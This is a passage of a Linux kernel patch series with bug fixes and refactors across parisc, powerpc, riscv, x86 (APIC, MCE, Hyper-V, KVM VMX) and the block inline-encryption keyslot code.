+--- a/arch/parisc/kernel/real2.S
++++ b/arch/parisc/kernel/real2.S
+@@ -248,9 +248,6 @@ ENTRY_CFI(real64_call_asm)
+ 	/* save fn */
+ 	copy	%arg2, %r31
+ 
+-	/* set up the new ap */
+-	ldo	64(%arg1), %r29
+-
+ 	/* load up the arg registers from the saved arg area */
+ 	/* 32-bit calling convention passes first 4 args in registers */
+ 	ldd	0*REG_SZ(%arg1), %arg0		/* note overwriting arg0 */
+@@ -262,7 +259,9 @@ ENTRY_CFI(real64_call_asm)
+ 	ldd	7*REG_SZ(%arg1), %r19
+ 	ldd	1*REG_SZ(%arg1), %arg1		/* do this one last! */
+ 
++	/* set up real-mode stack and real-mode ap */
+ 	tophys_r1 %sp
++	ldo	-16(%sp), %r29			/* Reference param save area */
+ 
+ 	b,l	rfi_virt2real,%r2
+ 	nop
+diff --git a/arch/powerpc/boot/Makefile b/arch/powerpc/boot/Makefile
+index 295f76df13b55..13fad4f0a6d8f 100644
+--- a/arch/powerpc/boot/Makefile
++++ b/arch/powerpc/boot/Makefile
+@@ -34,6 +34,8 @@ endif
+ 
+ BOOTCFLAGS    := -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs \
+ 		 -fno-strict-aliasing -O2 -msoft-float -mno-altivec -mno-vsx \
++		 $(call cc-option,-mno-prefixed) $(call cc-option,-mno-pcrel) \
++		 $(call cc-option,-mno-mma) \
+ 		 $(call cc-option,-mno-spe) $(call cc-option,-mspe=no) \
+ 		 -pipe -fomit-frame-pointer -fno-builtin -fPIC -nostdinc \
+ 		 $(LINUXINCLUDE)
+diff --git a/arch/powerpc/include/asm/reg.h b/arch/powerpc/include/asm/reg.h
+index 1e8b2e04e626a..8fda87af2fa5e 100644
+--- a/arch/powerpc/include/asm/reg.h
++++ b/arch/powerpc/include/asm/reg.h
+@@ -1310,6 +1310,11 @@
+ #define PVR_VER_E500MC	0x8023
+ #define PVR_VER_E5500	0x8024
+ #define PVR_VER_E6500	0x8040
++#define PVR_VER_7450	0x8000
++#define PVR_VER_7455	0x8001
++#define PVR_VER_7447	0x8002
++#define PVR_VER_7447A	0x8003
++#define PVR_VER_7448	0x8004
+ 
+ /*
+  * For the 8xx processors, all of them report the same PVR family for
+diff --git a/arch/powerpc/kernel/rtas.c b/arch/powerpc/kernel/rtas.c
+index 767ab166933ba..f8d3caad4cf39 100644
+--- a/arch/powerpc/kernel/rtas.c
++++ b/arch/powerpc/kernel/rtas.c
+@@ -421,7 +421,7 @@ static char *__fetch_rtas_last_error(char *altbuf)
+ 				buf = kmalloc(RTAS_ERROR_LOG_MAX, GFP_ATOMIC);
+ 		}
+ 		if (buf)
+-			memcpy(buf, rtas_err_buf, RTAS_ERROR_LOG_MAX);
++			memmove(buf, rtas_err_buf, RTAS_ERROR_LOG_MAX);
+ 	}
+ 
+ 	return buf;
+diff --git a/arch/powerpc/perf/mpc7450-pmu.c b/arch/powerpc/perf/mpc7450-pmu.c
+index 552d51a925d37..db451b9aac35e 100644
+--- a/arch/powerpc/perf/mpc7450-pmu.c
++++ b/arch/powerpc/perf/mpc7450-pmu.c
+@@ -417,9 +417,9 @@ struct power_pmu mpc7450_pmu = {
+ 
+ static int __init init_mpc7450_pmu(void)
+ {
+-	unsigned int pvr = mfspr(SPRN_PVR);
+-
+-	if (PVR_VER(pvr) != PVR_7450)
++	if (!pvr_version_is(PVR_VER_7450) && !pvr_version_is(PVR_VER_7455) &&
++	    !pvr_version_is(PVR_VER_7447) && !pvr_version_is(PVR_VER_7447A) &&
++	    !pvr_version_is(PVR_VER_7448))
+ 		return -ENODEV;
+ 
+ 	return register_power_pmu(&mpc7450_pmu);
+diff --git a/arch/powerpc/platforms/512x/clock-commonclk.c b/arch/powerpc/platforms/512x/clock-commonclk.c
+index 42abeba4f6983..079cb3627eacd 100644
+--- a/arch/powerpc/platforms/512x/clock-commonclk.c
++++ b/arch/powerpc/platforms/512x/clock-commonclk.c
+@@ -986,7 +986,7 @@ static void __init mpc5121_clk_provide_migration_support(void)
+ 
+ #define NODE_PREP do { \
+ 	of_address_to_resource(np, 0, &res); \
+-	snprintf(devname, sizeof(devname), "%08x.%s", res.start, np->name); \
++	snprintf(devname, sizeof(devname), "%pa.%s", &res.start, np->name); \
+ } while (0)
+ 
+ #define NODE_CHK(clkname, clkitem, regnode, regflag) do { \
+diff --git a/arch/powerpc/platforms/embedded6xx/flipper-pic.c b/arch/powerpc/platforms/embedded6xx/flipper-pic.c
+index 609bda2ad5dd2..4d9200bdba78c 100644
+--- a/arch/powerpc/platforms/embedded6xx/flipper-pic.c
++++ b/arch/powerpc/platforms/embedded6xx/flipper-pic.c
+@@ -145,7 +145,7 @@ static struct irq_domain * __init flipper_pic_init(struct device_node *np)
+ 	}
+ 	io_base = ioremap(res.start, resource_size(&res));
+ 
+-	pr_info("controller at 0x%08x mapped to 0x%p\n", res.start, io_base);
++	pr_info("controller at 0x%pa mapped to 0x%p\n", &res.start, io_base);
+ 
+ 	__flipper_quiesce(io_base);
+ 
+diff --git a/arch/powerpc/platforms/embedded6xx/hlwd-pic.c b/arch/powerpc/platforms/embedded6xx/hlwd-pic.c
+index 380b4285cce47..4d2d92de30afd 100644
+--- a/arch/powerpc/platforms/embedded6xx/hlwd-pic.c
++++ b/arch/powerpc/platforms/embedded6xx/hlwd-pic.c
+@@ -171,7 +171,7 @@ static struct irq_domain *__init hlwd_pic_init(struct device_node *np)
+ 		return NULL;
+ 	}
+ 
+-	pr_info("controller at 0x%08x mapped to 0x%p\n", res.start, io_base);
++	pr_info("controller at 0x%pa mapped to 0x%p\n", &res.start, io_base);
+ 
+ 	__hlwd_quiesce(io_base);
+ 
+diff --git a/arch/powerpc/platforms/embedded6xx/wii.c b/arch/powerpc/platforms/embedded6xx/wii.c
+index f4e654a9d4ff6..219659f2ede06 100644
+--- a/arch/powerpc/platforms/embedded6xx/wii.c
++++ b/arch/powerpc/platforms/embedded6xx/wii.c
+@@ -74,8 +74,8 @@ static void __iomem *__init wii_ioremap_hw_regs(char *name, char *compatible)
+ 
+ 	hw_regs = ioremap(res.start, resource_size(&res));
+ 	if (hw_regs) {
+-		pr_info("%s at 0x%08x mapped to 0x%p\n", name,
+-			res.start, hw_regs);
++		pr_info("%s at 0x%pa mapped to 0x%p\n", name,
++			&res.start, hw_regs);
+ 	}
+ 
+ out_put:
+diff --git a/arch/powerpc/sysdev/tsi108_pci.c b/arch/powerpc/sysdev/tsi108_pci.c
+index 5af4c35ff5842..0e42f7bad7db1 100644
+--- a/arch/powerpc/sysdev/tsi108_pci.c
++++ b/arch/powerpc/sysdev/tsi108_pci.c
+@@ -217,9 +217,8 @@ int __init tsi108_setup_pci(struct device_node *dev, u32 cfg_phys, int primary)
+ 
+ 	(hose)->ops = &tsi108_direct_pci_ops;
+ 
+-	printk(KERN_INFO "Found tsi108 PCI host bridge at 0x%08x. "
+-	       "Firmware bus number: %d->%d\n",
+-	       rsrc.start, hose->first_busno, hose->last_busno);
++	pr_info("Found tsi108 PCI host bridge at 0x%pa. Firmware bus number: %d->%d\n",
++		&rsrc.start, hose->first_busno, hose->last_busno);
+ 
+ 	/* Interpret the "ranges" property */
+ 	/* This also maps the I/O region and sets isa_io/mem_base */
+diff --git a/arch/riscv/include/asm/sbi.h b/arch/riscv/include/asm/sbi.h
+index 2a0ef738695ed..9baddaee56238 100644
+--- a/arch/riscv/include/asm/sbi.h
++++ b/arch/riscv/include/asm/sbi.h
+@@ -293,7 +293,7 @@ int sbi_remote_hfence_vvma_asid(const struct cpumask *cpu_mask,
+ 				unsigned long start,
+ 				unsigned long size,
+ 				unsigned long asid);
+-int sbi_probe_extension(int ext);
++long sbi_probe_extension(int ext);
+ 
+ /* Check if current SBI specification version is 0.1 or not */
+ static inline int sbi_spec_is_0_1(void)
+diff --git a/arch/riscv/kernel/cpu_ops.c b/arch/riscv/kernel/cpu_ops.c
+index 8275f237a59df..eb479a88a954e 100644
+--- a/arch/riscv/kernel/cpu_ops.c
++++ b/arch/riscv/kernel/cpu_ops.c
+@@ -27,7 +27,7 @@ const struct cpu_operations cpu_ops_spinwait = {
+ void __init cpu_set_ops(int cpuid)
+ {
+ #if IS_ENABLED(CONFIG_RISCV_SBI)
+-	if (sbi_probe_extension(SBI_EXT_HSM) > 0) {
++	if (sbi_probe_extension(SBI_EXT_HSM)) {
+ 		if (!cpuid)
+ 			pr_info("SBI HSM extension detected\n");
+ 		cpu_ops[cpuid] = &cpu_ops_sbi;
+diff --git a/arch/riscv/kernel/sbi.c b/arch/riscv/kernel/sbi.c
+index 775d3322b422f..5238026f7c0d1 100644
+--- a/arch/riscv/kernel/sbi.c
++++ b/arch/riscv/kernel/sbi.c
+@@ -581,19 +581,18 @@ static void sbi_srst_power_off(void)
+  * sbi_probe_extension() - Check if an SBI extension ID is supported or not.
+  * @extid: The extension ID to be probed.
+  *
+- * Return: Extension specific nonzero value f yes, -ENOTSUPP otherwise.
++ * Return: 1 or an extension specific nonzero value if yes, 0 otherwise.
+  */
+-int sbi_probe_extension(int extid)
++long sbi_probe_extension(int extid)
+ {
+ 	struct sbiret ret;
+ 
+ 	ret = sbi_ecall(SBI_EXT_BASE, SBI_EXT_BASE_PROBE_EXT, extid,
+ 			0, 0, 0, 0, 0);
+ 	if (!ret.error)
+-		if (ret.value)
+-			return ret.value;
++		return ret.value;
+ 
+-	return -ENOTSUPP;
++	return 0;
+ }
+ EXPORT_SYMBOL(sbi_probe_extension);
+ 
+@@ -662,26 +661,26 @@ void __init sbi_init(void)
+ 	if (!sbi_spec_is_0_1()) {
+ 		pr_info("SBI implementation ID=0x%lx Version=0x%lx\n",
+ 			sbi_get_firmware_id(), sbi_get_firmware_version());
+-		if (sbi_probe_extension(SBI_EXT_TIME) > 0) {
++		if (sbi_probe_extension(SBI_EXT_TIME)) {
+ 			__sbi_set_timer = __sbi_set_timer_v02;
+ 			pr_info("SBI TIME extension detected\n");
+ 		} else {
+ 			__sbi_set_timer = __sbi_set_timer_v01;
+ 		}
+-		if (sbi_probe_extension(SBI_EXT_IPI) > 0) {
++		if (sbi_probe_extension(SBI_EXT_IPI)) {
+ 			__sbi_send_ipi	= __sbi_send_ipi_v02;
+ 			pr_info("SBI IPI extension detected\n");
+ 		} else {
+ 			__sbi_send_ipi	= __sbi_send_ipi_v01;
+ 		}
+-		if (sbi_probe_extension(SBI_EXT_RFENCE) > 0) {
++		if (sbi_probe_extension(SBI_EXT_RFENCE)) {
+ 			__sbi_rfence	= __sbi_rfence_v02;
+ 			pr_info("SBI RFENCE extension detected\n");
+ 		} else {
+ 			__sbi_rfence	= __sbi_rfence_v01;
+ 		}
+ 		if ((sbi_spec_version >= sbi_mk_version(0, 3)) &&
+-		    (sbi_probe_extension(SBI_EXT_SRST) > 0)) {
++		    sbi_probe_extension(SBI_EXT_SRST)) {
+ 			pr_info("SBI SRST extension detected\n");
+ 			pm_power_off = sbi_srst_power_off;
+ 			sbi_srst_reboot_nb.notifier_call = sbi_srst_reboot;
+diff --git a/arch/riscv/kvm/main.c b/arch/riscv/kvm/main.c
+index df2d8716851f2..62eedad7ec095 100644
+--- a/arch/riscv/kvm/main.c
++++ b/arch/riscv/kvm/main.c
+@@ -84,7 +84,7 @@ int kvm_arch_init(void *opaque)
+ 		return -ENODEV;
+ 	}
+ 
+-	if (sbi_probe_extension(SBI_EXT_RFENCE) <= 0) {
++	if (!sbi_probe_extension(SBI_EXT_RFENCE)) {
+ 		kvm_info("require SBI RFENCE extension\n");
+ 		return -ENODEV;
+ 	}
+diff --git a/arch/riscv/kvm/mmu.c b/arch/riscv/kvm/mmu.c
+index 3620ecac2fa14..e47aeb6f05a6e 100644
+--- a/arch/riscv/kvm/mmu.c
++++ b/arch/riscv/kvm/mmu.c
+@@ -630,6 +630,13 @@ int kvm_riscv_gstage_map(struct kvm_vcpu *vcpu,
+ 			!(memslot->flags & KVM_MEM_READONLY)) ? true : false;
+ 	unsigned long vma_pagesize, mmu_seq;
+ 
++	/* We need minimum second+third level pages */
++	ret = kvm_mmu_topup_memory_cache(pcache, gstage_pgd_levels);
++	if (ret) {
++		kvm_err("Failed to topup G-stage cache\n");
++		return ret;
++	}
++
+ 	mmap_read_lock(current->mm);
+ 
+ 	vma = find_vma_intersection(current->mm, hva, hva + 1);
+@@ -650,6 +657,15 @@ int kvm_riscv_gstage_map(struct kvm_vcpu *vcpu,
+ 	if (vma_pagesize == PMD_SIZE || vma_pagesize == PGDIR_SIZE)
+ 		gfn = (gpa & huge_page_mask(hstate_vma(vma))) >> PAGE_SHIFT;
+ 
++	/*
++	 * Read mmu_invalidate_seq so that KVM can detect if the results of
++	 * vma_lookup() or gfn_to_pfn_prot() become stale priort to acquiring
++	 * kvm->mmu_lock.
++	 *
++	 * Rely on mmap_read_unlock() for an implicit smp_rmb(), which pairs
++	 * with the smp_wmb() in kvm_mmu_invalidate_end().
++	 */
++	mmu_seq = kvm->mmu_invalidate_seq;
+ 	mmap_read_unlock(current->mm);
+ 
+ 	if (vma_pagesize != PGDIR_SIZE &&
+@@ -659,15 +675,6 @@ int kvm_riscv_gstage_map(struct kvm_vcpu *vcpu,
+ 		return -EFAULT;
+ 	}
+ 
+-	/* We need minimum second+third level pages */
+-	ret = kvm_mmu_topup_memory_cache(pcache, gstage_pgd_levels);
+-	if (ret) {
+-		kvm_err("Failed to topup G-stage cache\n");
+-		return ret;
+-	}
+-
+-	mmu_seq = kvm->mmu_invalidate_seq;
+-
+ 	hfn = gfn_to_pfn_prot(kvm, gfn, is_write, &writable);
+ 	if (hfn == KVM_PFN_ERR_HWPOISON) {
+ 		send_sig_mceerr(BUS_MCEERR_AR, (void __user *)hva,
+diff --git a/arch/riscv/mm/init.c b/arch/riscv/mm/init.c
+index 6f47ced3175b4..6315a3c942259 100644
+--- a/arch/riscv/mm/init.c
++++ b/arch/riscv/mm/init.c
+@@ -842,8 +842,7 @@ static void __init create_kernel_page_table(pgd_t *pgdir, bool early)
+  * this means 2 PMD entries whereas for 32-bit kernel, this is only 1 PGDIR
+  * entry.
+  */
+-static void __init create_fdt_early_page_table(pgd_t *pgdir,
+-					       uintptr_t fix_fdt_va,
++static void __init create_fdt_early_page_table(uintptr_t fix_fdt_va,
+ 					       uintptr_t dtb_pa)
+ {
+ 	uintptr_t pa = dtb_pa & ~(PMD_SIZE - 1);
+@@ -1033,8 +1032,7 @@ asmlinkage void __init setup_vm(uintptr_t dtb_pa)
+ 	create_kernel_page_table(early_pg_dir, true);
+ 
+ 	/* Setup early mapping for FDT early scan */
+-	create_fdt_early_page_table(early_pg_dir,
+-				    __fix_to_virt(FIX_FDT), dtb_pa);
++	create_fdt_early_page_table(__fix_to_virt(FIX_FDT), dtb_pa);
+ 
+ 	/*
+ 	 * Bootime fixmap only can handle PMD_SIZE mapping. Thus, boot-ioremap
+diff --git a/arch/riscv/mm/ptdump.c b/arch/riscv/mm/ptdump.c
+index 830e7de65e3a3..20a9f991a6d74 100644
+--- a/arch/riscv/mm/ptdump.c
++++ b/arch/riscv/mm/ptdump.c
+@@ -59,10 +59,6 @@ struct ptd_mm_info {
+ };
+ 
+ enum address_markers_idx {
+-#ifdef CONFIG_KASAN
+-	KASAN_SHADOW_START_NR,
+-	KASAN_SHADOW_END_NR,
+-#endif
+ 	FIXMAP_START_NR,
+ 	FIXMAP_END_NR,
+ 	PCI_IO_START_NR,
+@@ -74,6 +70,10 @@ enum address_markers_idx {
+ 	VMALLOC_START_NR,
+ 	VMALLOC_END_NR,
+ 	PAGE_OFFSET_NR,
++#ifdef CONFIG_KASAN
++	KASAN_SHADOW_START_NR,
++	KASAN_SHADOW_END_NR,
++#endif
+ #ifdef CONFIG_64BIT
+ 	MODULES_MAPPING_NR,
+ 	KERNEL_MAPPING_NR,
+@@ -82,10 +82,6 @@ enum address_markers_idx {
+ };
+ 
+ static struct addr_marker address_markers[] = {
+-#ifdef CONFIG_KASAN
+-	{0, "Kasan shadow start"},
+-	{0, "Kasan shadow end"},
+-#endif
+ 	{0, "Fixmap start"},
+ 	{0, "Fixmap end"},
+ 	{0, "PCI I/O start"},
+@@ -97,6 +93,10 @@ static struct addr_marker address_markers[] = {
+ 	{0, "vmalloc() area"},
+ 	{0, "vmalloc() end"},
+ 	{0, "Linear mapping"},
++#ifdef CONFIG_KASAN
++	{0, "Kasan shadow start"},
++	{0, "Kasan shadow end"},
++#endif
+ #ifdef CONFIG_64BIT
+ 	{0, "Modules/BPF mapping"},
+ 	{0, "Kernel mapping"},
+@@ -362,10 +362,6 @@ static int __init ptdump_init(void)
+ {
+ 	unsigned int i, j;
+ 
+-#ifdef CONFIG_KASAN
+-	address_markers[KASAN_SHADOW_START_NR].start_address = KASAN_SHADOW_START;
+-	address_markers[KASAN_SHADOW_END_NR].start_address = KASAN_SHADOW_END;
+-#endif
+ 	address_markers[FIXMAP_START_NR].start_address = FIXADDR_START;
+ 	address_markers[FIXMAP_END_NR].start_address = FIXADDR_TOP;
+ 	address_markers[PCI_IO_START_NR].start_address = PCI_IO_START;
+@@ -377,6 +373,10 @@ static int __init ptdump_init(void)
+ 	address_markers[VMALLOC_START_NR].start_address = VMALLOC_START;
+ 	address_markers[VMALLOC_END_NR].start_address = VMALLOC_END;
+ 	address_markers[PAGE_OFFSET_NR].start_address = PAGE_OFFSET;
++#ifdef CONFIG_KASAN
++	address_markers[KASAN_SHADOW_START_NR].start_address = KASAN_SHADOW_START;
++	address_markers[KASAN_SHADOW_END_NR].start_address = KASAN_SHADOW_END;
++#endif
+ #ifdef CONFIG_64BIT
+ 	address_markers[MODULES_MAPPING_NR].start_address = MODULES_VADDR;
+ 	address_markers[KERNEL_MAPPING_NR].start_address = kernel_map.virt_addr;
+diff --git a/arch/sh/kernel/cpu/sh4/sq.c b/arch/sh/kernel/cpu/sh4/sq.c
+index a76b94e41e913..8ddfe9989f5fc 100644
+--- a/arch/sh/kernel/cpu/sh4/sq.c
++++ b/arch/sh/kernel/cpu/sh4/sq.c
+@@ -382,7 +382,7 @@ static int __init sq_api_init(void)
+ 	if (unlikely(!sq_cache))
+ 		return ret;
+ 
+-	sq_bitmap = kzalloc(size, GFP_KERNEL);
++	sq_bitmap = kcalloc(size, sizeof(long), GFP_KERNEL);
+ 	if (unlikely(!sq_bitmap))
+ 		goto out;
+ 
+diff --git a/arch/x86/include/asm/intel-family.h b/arch/x86/include/asm/intel-family.h
+index cbaf174d8efd9..b3af2d45bbbb5 100644
+--- a/arch/x86/include/asm/intel-family.h
++++ b/arch/x86/include/asm/intel-family.h
+@@ -125,6 +125,8 @@
+ 
+ #define INTEL_FAM6_LUNARLAKE_M		0xBD
+ 
++#define INTEL_FAM6_ARROWLAKE		0xC6
++
+ /* "Small Core" Processors (Atom/E-Core) */
+ 
+ #define INTEL_FAM6_ATOM_BONNELL		0x1C /* Diamondville, Pineview */
+diff --git a/arch/x86/kernel/apic/apic.c b/arch/x86/kernel/apic/apic.c
+index 20d9a604da7c4..7705571100518 100644
+--- a/arch/x86/kernel/apic/apic.c
++++ b/arch/x86/kernel/apic/apic.c
+@@ -422,10 +422,9 @@ static unsigned int reserve_eilvt_offset(int offset, unsigned int new)
+ 		if (vector && !eilvt_entry_is_changeable(vector, new))
+ 			/* may not change if vectors are different */
+ 			return rsvd;
+-		rsvd = atomic_cmpxchg(&eilvt_offsets[offset], rsvd, new);
+-	} while (rsvd != new);
++	} while (!atomic_try_cmpxchg(&eilvt_offsets[offset], &rsvd, new));
+ 
+-	rsvd &= ~APIC_EILVT_MASKED;
++	rsvd = new & ~APIC_EILVT_MASKED;
+ 	if (rsvd && rsvd != vector)
+ 		pr_info("LVT offset %d assigned for vector 0x%02x\n",
+ 			offset, rsvd);
+diff --git a/arch/x86/kernel/apic/io_apic.c b/arch/x86/kernel/apic/io_apic.c
+index a868b76cd3d42..efa87b6bb1cde 100644
+--- a/arch/x86/kernel/apic/io_apic.c
++++ b/arch/x86/kernel/apic/io_apic.c
+@@ -2480,17 +2480,21 @@ static int io_apic_get_redir_entries(int ioapic)
+ 
+ unsigned int arch_dynirq_lower_bound(unsigned int from)
+ {
++	unsigned int ret;
++
+ 	/*
+ 	 * dmar_alloc_hwirq() may be called before setup_IO_APIC(), so use
+ 	 * gsi_top if ioapic_dynirq_base hasn't been initialized yet.
+ 	 */
+-	if (!ioapic_initialized)
+-		return gsi_top;
++	ret = ioapic_dynirq_base ? : gsi_top;
++
+ 	/*
+-	 * For DT enabled machines ioapic_dynirq_base is irrelevant and not
+-	 * updated. So simply return @from if ioapic_dynirq_base == 0.
++	 * For DT enabled machines ioapic_dynirq_base is irrelevant and
++	 * always 0. gsi_top can be 0 if there is no IO/APIC registered.
++	 * 0 is an invalid interrupt number for dynamic allocations. Return
++	 * @from instead.
+ 	 */
+-	return ioapic_dynirq_base ? : from;
++	return ret ? : from;
+ }
+ 
+ #ifdef CONFIG_X86_32
+diff --git a/arch/x86/kernel/cpu/mce/amd.c b/arch/x86/kernel/cpu/mce/amd.c
+index 10fb5b5c9efa4..5518272061bfb 100644
+--- a/arch/x86/kernel/cpu/mce/amd.c
++++ b/arch/x86/kernel/cpu/mce/amd.c
+@@ -235,10 +235,10 @@ static DEFINE_PER_CPU(struct threshold_bank **, threshold_banks);
+  * A list of the banks enabled on each logical CPU. Controls which respective
+  * descriptors to initialize later in mce_threshold_create_device().
+  */
+-static DEFINE_PER_CPU(unsigned int, bank_map);
++static DEFINE_PER_CPU(u64, bank_map);
+ 
+ /* Map of banks that have more than MCA_MISC0 available. */
+-static DEFINE_PER_CPU(u32, smca_misc_banks_map);
++static DEFINE_PER_CPU(u64, smca_misc_banks_map);
+ 
+ static void amd_threshold_interrupt(void);
+ static void amd_deferred_error_interrupt(void);
+@@ -267,7 +267,7 @@ static void smca_set_misc_banks_map(unsigned int bank, unsigned int cpu)
+ 		return;
+ 
+ 	if (low & MASK_BLKPTR_LO)
+-		per_cpu(smca_misc_banks_map, cpu) |= BIT(bank);
++		per_cpu(smca_misc_banks_map, cpu) |= BIT_ULL(bank);
+ 
+ }
+ 
+@@ -528,7 +528,7 @@ static u32 smca_get_block_address(unsigned int bank, unsigned int block,
+ 	if (!block)
+ 		return MSR_AMD64_SMCA_MCx_MISC(bank);
+ 
+-	if (!(per_cpu(smca_misc_banks_map, cpu) & BIT(bank)))
++	if (!(per_cpu(smca_misc_banks_map, cpu) & BIT_ULL(bank)))
+ 		return 0;
+ 
+ 	return MSR_AMD64_SMCA_MCx_MISCy(bank, block - 1);
+@@ -572,7 +572,7 @@ prepare_threshold_block(unsigned int bank, unsigned int block, u32 addr,
+ 	int new;
+ 
+ 	if (!block)
+-		per_cpu(bank_map, cpu) |= (1 << bank);
++		per_cpu(bank_map, cpu) |= BIT_ULL(bank);
+ 
+ 	memset(&b, 0, sizeof(b));
+ 	b.cpu			= cpu;
+@@ -884,7 +884,7 @@ static void amd_threshold_interrupt(void)
+ 		return;
+ 
+ 	for (bank = 0; bank < this_cpu_read(mce_num_banks); ++bank) {
+-		if (!(per_cpu(bank_map, cpu) & (1 << bank)))
++		if (!(per_cpu(bank_map, cpu) & BIT_ULL(bank)))
+ 			continue;
+ 
+ 		first_block = bp[bank]->blocks;
+@@ -1362,7 +1362,7 @@ int mce_threshold_create_device(unsigned int cpu)
+ 		return -ENOMEM;
+ 
+ 	for (bank = 0; bank < numbanks; ++bank) {
+-		if (!(this_cpu_read(bank_map) & (1 << bank)))
++		if (!(this_cpu_read(bank_map) & BIT_ULL(bank)))
+ 			continue;
+ 		err = threshold_create_bank(bp, cpu, bank);
+ 		if (err) {
+diff --git a/arch/x86/kernel/cpu/mshyperv.c b/arch/x86/kernel/cpu/mshyperv.c
+index 831613959a92a..34d9e899e471e 100644
+--- a/arch/x86/kernel/cpu/mshyperv.c
++++ b/arch/x86/kernel/cpu/mshyperv.c
+@@ -291,12 +291,16 @@ static void __init ms_hyperv_init_platform(void)
+ 	 * To mirror what Windows does we should extract CPU management
+ 	 * features and use the ReservedIdentityBit to detect if Linux is the
+ 	 * root partition. But that requires negotiating CPU management
+-	 * interface (a process to be finalized).
++	 * interface (a process to be finalized). For now, use the privilege
++	 * flag as the indicator for running as root.
+ 	 *
+-	 * For now, use the privilege flag as the indicator for running as
+-	 * root.
++	 * Hyper-V should never specify running as root and as a Confidential
++	 * VM. But to protect against a compromised/malicious Hyper-V trying
++	 * to exploit root behavior to expose Confidential VM memory, ignore
++	 * the root partition setting if also a Confidential VM.
+ 	 */
+-	if (cpuid_ebx(HYPERV_CPUID_FEATURES) & HV_CPU_MANAGEMENT) {
++	if ((ms_hyperv.priv_high & HV_CPU_MANAGEMENT) &&
++	    !(ms_hyperv.priv_high & HV_ISOLATION)) {
+ 		hv_root_partition = true;
+ 		pr_info("Hyper-V: running as root partition\n");
+ 	}
+diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
+index bc868958e91fe..4c9116d223df5 100644
+--- a/arch/x86/kvm/vmx/vmx.c
++++ b/arch/x86/kvm/vmx/vmx.c
+@@ -7830,6 +7830,21 @@ static int vmx_check_intercept(struct kvm_vcpu *vcpu,
+ 		/* FIXME: produce nested vmexit and return X86EMUL_INTERCEPTED.  */
+ 		break;
+ 
++	case x86_intercept_pause:
++		/*
++		 * PAUSE is a single-byte NOP with a REPE prefix, i.e. collides
++		 * with vanilla NOPs in the emulator.  Apply the interception
++		 * check only to actual PAUSE instructions.  Don't check
++		 * PAUSE-loop-exiting, software can't expect a given PAUSE to
++		 * exit, i.e. KVM is within its rights to allow L2 to execute
++		 * the PAUSE.
++		 */
++		if ((info->rep_prefix != REPE_PREFIX) ||
++		    !nested_cpu_has2(vmcs12, CPU_BASED_PAUSE_EXITING))
++			return X86EMUL_CONTINUE;
++
++		break;
++
+ 	/* TODO: check more intercepts... */
+ 	default:
+ 		break;
+diff --git a/block/blk-crypto-internal.h b/block/blk-crypto-internal.h
+index e6818ffaddbf8..8ac5597dc69c3 100644
+--- a/block/blk-crypto-internal.h
++++ b/block/blk-crypto-internal.h
+@@ -65,6 +65,23 @@ static inline bool blk_crypto_rq_is_encrypted(struct request *rq)
+ 	return rq->crypt_ctx;
+ }
+ 
++static inline bool blk_crypto_rq_has_keyslot(struct request *rq)
++{
++	return rq->crypt_keyslot;
++}
++
++blk_status_t blk_crypto_get_keyslot(struct blk_crypto_profile *profile,
++				    const struct blk_crypto_key *key,
++				    struct blk_crypto_keyslot **slot_ptr);
++
++void blk_crypto_put_keyslot(struct blk_crypto_keyslot *slot);
++
++int __blk_crypto_evict_key(struct blk_crypto_profile *profile,
++			   const struct blk_crypto_key *key);
++
++bool __blk_crypto_cfg_supported(struct blk_crypto_profile *profile,
++				const struct blk_crypto_config *cfg);
++
+ #else /* CONFIG_BLK_INLINE_ENCRYPTION */
+ 
+ static inline int blk_crypto_sysfs_register(struct request_queue *q)
+@@ -105,6 +122,11 @@ static inline bool blk_crypto_rq_is_encrypted(struct request *rq)
+ 	return false;
+ }
+ 
++static inline bool blk_crypto_rq_has_keyslot(struct request *rq)
++{
++	return false;
++}
++
+ #endif /* CONFIG_BLK_INLINE_ENCRYPTION */
+ 
+ void __bio_crypt_advance(struct bio *bio, unsigned int bytes);
+@@ -139,14 +161,21 @@ static inline bool blk_crypto_bio_prep(struct bio **bio_ptr)
+ 	return true;
+ }
+ 
+-blk_status_t __blk_crypto_init_request(struct request *rq);
+-static inline blk_status_t blk_crypto_init_request(struct request *rq)
++blk_status_t __blk_crypto_rq_get_keyslot(struct request *rq);
++static inline blk_status_t blk_crypto_rq_get_keyslot(struct request *rq)
+ {
+ 	if (blk_crypto_rq_is_encrypted(rq))
+-		return __blk_crypto_init_request(rq);
++		return __blk_crypto_rq_get_keyslot(rq);
+ 	return BLK_STS_OK;
+ }
+ 
++void __blk_crypto_rq_put_keyslot(struct request *rq);
++static inline void blk_crypto_rq_put_keyslot(struct request *rq)
++{
++	if (blk_crypto_rq_has_keyslot(rq))
++		__blk_crypto_rq_put_keyslot(rq);
++}
++
+ void __blk_crypto_free_request(struct request *rq);
+ static inline void blk_crypto_free_request(struct request *rq)
+ {
+@@ -185,7 +214,7 @@ static inline blk_status_t blk_crypto_insert_cloned_request(struct request *rq)
+ {
+ 
+ 	if (blk_crypto_rq_is_encrypted(rq))
+-		return blk_crypto_init_request(rq);
++		return blk_crypto_rq_get_keyslot(rq);
+ 	return BLK_STS_OK;
+ }
+ 
+diff --git a/block/blk-crypto-profile.c b/block/blk-crypto-profile.c
+index 96c511967386d..3290c03c9918d 100644
+--- a/block/blk-crypto-profile.c
++++ b/block/blk-crypto-profile.c
+@@ -32,6 +32,7 @@
+ #include <linux/wait.h>
+ #include <linux/blkdev.h>
+ #include <linux/blk-integrity.h>
++#include "blk-crypto-internal.h"
+ 
+ struct blk_crypto_keyslot {
+ 	atomic_t slot_refs;
+@@ -353,28 +354,16 @@ bool __blk_crypto_cfg_supported(struct blk_crypto_profile *profile,
+ 	return true;
+ }
+ 
+-/**
+- * __blk_crypto_evict_key() - Evict a key from a device.
+- * @profile: the crypto profile of the device
+- * @key: the key to evict.  It must not still be used in any I/O.
+- *
+- * If the device has keyslots, this finds the keyslot (if any) that contains the
+- * specified key and calls the driver's keyslot_evict function to evict it.
+- *
+- * Otherwise, this just calls the driver's keyslot_evict function if it is
+- * implemented, passing just the key (without any particular keyslot).  This
+- * allows layered devices to evict the key from their underlying devices.
+- *
+- * Context: Process context. Takes and releases profile->lock.
+- * Return: 0 on success or if there's no keyslot with the specified key, -EBUSY
+- *	   if the keyslot is still in use, or another -errno value on other
+- *	   error.
++/*
++ * This is an internal function that evicts a key from an inline encryption
++ * device that can be either a real device or the blk-crypto-fallback "device".
++ * It is used only by blk_crypto_evict_key(); see that function for details.
